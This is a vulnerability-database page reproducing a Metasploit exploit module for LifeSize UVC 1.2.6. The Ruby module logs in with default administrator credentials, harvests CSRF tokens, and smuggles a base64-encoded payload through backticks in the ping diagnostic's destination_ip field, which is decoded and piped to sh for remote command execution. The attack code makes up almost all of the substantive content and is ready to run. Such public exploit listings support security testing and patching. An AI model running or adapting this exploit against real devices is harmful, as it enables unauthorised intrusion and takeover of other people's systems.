Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LifeSize UVC Authenticated Remote Command Execution

🗓️ 25 Mar 2014 00:00:00Reported by metasploitType 
zdt
 zdt🔗 0day.today👁 21 Views

LifeSize UVC authenticated remote command execution as admin allows abuse of ping diagnostic function for RCE as www-data user

Code
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "LifeSize UVC Authenticated RCE via Ping",
      'Description'    => %q{
      When authenticated as an administrator on LifeSize UVC 1.2.6, an attacker
      can abuse the ping diagnostic functionality to achieve remote command
      execution as the www-data user (or equivalent)
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Brandon Perry <bperry.volatile[at]gmail.com>' #discovery/metasploit module
        ],
      'References'     =>
        [
          ['EDB', '32437']
        ],
      'Platform'       => ['unix'],
      'Arch'           => ARCH_CMD,
      'Targets'        =>
        [
          ['LifeSize UVC version <= 1.2.6', {}]
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'DisableNops' => true,
          'Compat'      =>
            {
              'PayloadType' => 'cmd',
              'RequiredCmd' => 'python'
            }
        },
      'DisclosureDate' => "Mar 21 2014",
      'DefaultTarget'  => 0))

      register_options(
        [
          Opt::RPORT(443),
          OptBool.new('SSL', [true, 'Use SSL', true]),
          OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/']),
          OptString.new('USERNAME', [true, 'The username to authenticate with', 'administrator']),
          OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin123'])
        ], self.class)
  end

  def exploit
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'accounts', 'login/')
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    if res.code != 200
      fail_with("Did not get a 200 response, perhaps the server isn't on an SSL port")
    end

    token = /name='csrfmiddlewaretoken' value='(.*)'/.match(res.body)

    if token.length < 2
      fail_with("Could not find token on page.")
    end

    token = token[1]

    post = {
      'csrfmiddlewaretoken' => token,
      'username' => datastore['USERNAME'],
      'password' => datastore['PASSWORD']
    }

    #referer is required
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'accounts/'),
      'method' => 'POST',
      'vars_post' => post,
      'headers' => {
        'Referer' => 'https://' + datastore['RHOST'] + '/accounts/'
      },
      'cookie' => 'csrftoken=' + token
    })

    if !res
      fail_with("Server did not respond in an expected way")
    end

    #we want a 302, 200 means we are back at login page
    if res.code == 200
      fail_with("Authentication failed. Please check your username and password.")
    end

    cookie = res.get_cookies

    new_cookie = 'csrftoken=' + token + '; ' + cookie

    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'server-admin', 'operations', 'diagnose', 'ping/'),
      'cookie' => new_cookie
    })

    if !res or !res.body
      fail_with("Server did not respond in an expected way")
    end

    token = /name='csrfmiddlewaretoken' value='(.*)'/.match(res.body)
    token = token[1]

    new_cookie = 'csrftoken=' + token + '; ' + cookie

    pay = 'csrfmiddlewaretoken='+token
    pay << '&source_ip=' + datastore['RHOST']
    pay << '&destination_ip=go`echo ' + Rex::Text.encode_base64(payload.encoded) + '|base64 --decode|sh`ogle.com'

    #referer is required
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'server-admin', 'operations', 'diagnose', 'ping/'),
      'method' => 'POST',
      'headers' => {
        'Referer' => 'https://' + datastore['RHOST'] + '/server-admin/operations/diagnose/ping/'
      },
      'cookie' => new_cookie,
      'data' => pay
    })
  end
end

#  0day.today [2018-03-19]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
25 Mar 2014 00:00Current
7.2High risk
Vulners AI Score7.2
metasploitremote executionhttp requestauthenticationadministratorlifesize uvcpingdiagnosticremote command executionwww-dataunixcsrf tokenpayloadssl port
21